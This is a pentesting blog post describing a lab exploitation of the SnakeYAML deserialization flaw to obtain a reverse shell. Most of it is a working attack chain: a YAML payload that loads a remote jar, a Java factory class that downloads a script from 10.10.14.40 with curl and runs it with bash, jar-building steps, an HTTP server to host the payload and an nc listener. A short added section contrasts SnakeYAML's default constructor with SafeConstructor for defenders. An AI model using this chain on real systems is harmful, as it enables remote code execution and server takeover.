SnakeYAML for Reverse Shell

Hi Brother,

I want to share a short journey from my pentesting in the lab, to keep myself updated. The vulnerability I want to share here is not new, but it is quite easy to exploit and very straightforward. I also found that some Swagger YAML-based applications are still vulnerable to this.

During the enumeration of an application, I found that the application gives an error message that allowed me to find some good information: this application is using the YAML parser from SnakeYAML.

Based on the above information, I found a good article explaining that this YAML parser library has a deserialization vulnerability: https://securitylab.github.com/research/swagger-yaml-parser-vulnerability/ With the code below you can actually invoke remote command execution.

This is the exploit that we can develop for the test. We can download it from https://github.com/artsploit/yaml-payload

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://artsploit.com/yaml-payload.jar"]
  ]]
]

So whenever I put this payload into the parser, remote command execution is triggered.

In the above picture we can see that whenever SnakeYAML parses the document, the remote code execution is triggered. The default SnakeYAML constructor resolves the !!javax.script.ScriptEngineManager tag to that class and calls its constructor with the URLClassLoader as the argument; ScriptEngineManager then uses ServiceLoader to instantiate every ScriptEngineFactory registered in the remote jar, which is where our code runs.
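To make the primitive behind the payload concrete, here is an added example (not code from the original post or from the artsploit repo) that parses a probe document of the same shape as the exploit, but naming a harmless class, first with SnakeYAML's default constructor and then with SafeConstructor. It assumes snakeyaml 1.31 to 1.33 on the classpath (SafeConstructor(LoaderOptions) exists from 1.31; SnakeYAML 2.0 changed the default to reject global tags); the URL in the probe is a placeholder, not a real host.

```java
// Demo.java: added example, not part of the original post or the artsploit repo.
// Build/run (assumed jar name): javac -cp snakeyaml-1.33.jar Demo.java
//                               java -cp snakeyaml-1.33.jar:. Demo
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

public class Demo {
    // Constructed input: same shape as the exploit payload, but the class it
    // names (java.net.URL) is harmless. attacker.invalid is a placeholder host.
    static final String PROBE =
        "!!java.net.URL [\"http://attacker.invalid/yaml-payload.jar\"]";

    // Vulnerable: the default Constructor turns any !!fully.qualified.Name tag
    // into Class.forName and calls a constructor whose arity matches the sequence.
    // On 1.x this returns a java.net.URL built from untrusted input.
    static Object loadUnsafe(String doc) {
        return new Yaml().load(doc);
    }

    // Hardened: SafeConstructor only knows the standard YAML types (maps, lists,
    // scalars), so a global tag raises a YAMLException instead of instantiating
    // an arbitrary class. Use this for any YAML that comes from a client.
    static Object loadSafe(String doc) {
        LoaderOptions opts = new LoaderOptions();
        return new Yaml(new SafeConstructor(opts)).load(doc);
    }

    public static void main(String[] args) {
        for (String mode : new String[] {"default", "safe"}) {
            try {
                Object o = mode.equals("default") ? loadUnsafe(PROBE) : loadSafe(PROBE);
                System.out.println(mode + ": instantiated " + o.getClass().getName());
            } catch (YAMLException e) {
                System.out.println(mode + ": rejected, " + e.getMessage());
            }
        }
    }
}
```

The check to run against your own code base is simple: any `new Yaml()` or `Yaml.load` reachable from user input without a SafeConstructor (or, on 2.x, without an explicit allowlist via LoaderOptions) is the same condition the post exploits.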

Let's weaponize the payload. Look into AwesomeScriptEngineFactory.java in the downloaded repo: its constructor runs as soon as ScriptEngineManager loads the jar, so that is where we trigger the reverse shell.

package artsploit;
import java.io.IOException;
import javax.script.ScriptEngineFactory;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {
    public AwesomeScriptEngineFactory() {
        try {
            // fetch the script, wait for curl to finish, then run it
            Runtime.getRuntime().exec("curl http://10.10.14.40:8009/revshell.sh -o /tmp/revshell.sh").waitFor();
            Runtime.getRuntime().exec("bash /tmp/revshell.sh");
        } catch (IOException | InterruptedException e) {
            e.printStackTrace();
        }
    }
    // remaining ScriptEngineFactory methods unchanged from the repo
}

Above is my code to download the reverse shell script and execute it on the server.

Do not forget to compile AwesomeScriptEngineFactory.java and package it into a jar. Pack the whole src/ tree, not just the class file: the repo's src/META-INF/services/javax.script.ScriptEngineFactory entry is how ScriptEngineManager discovers the factory, and without it nothing runs. If the target runs an older JVM, pass a matching --release to javac so the class file loads.

javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

This is the reverse shell command that I saved in the revshell.sh file, which is going to be downloaded and executed on the server.

Once all of the above is ready, I need to set up an HTTP server to host revshell.sh. The same server can also host the compiled yaml-payload.jar; whatever you use, the URL inside the !!java.net.URL tag of the payload has to point at where the jar is actually served.

python3 -m http.server 8009
Serving HTTP on 0.0.0.0 port 8009 (http://0.0.0.0:8009/) ...

Next, start the nc listener for the reverse shell connection:

nc -nlvp 9090   
listening on [any] 9090 ...

Let's execute the attack and wait for the reverse shell to connect back to us.

And now the reverse connection has been established.
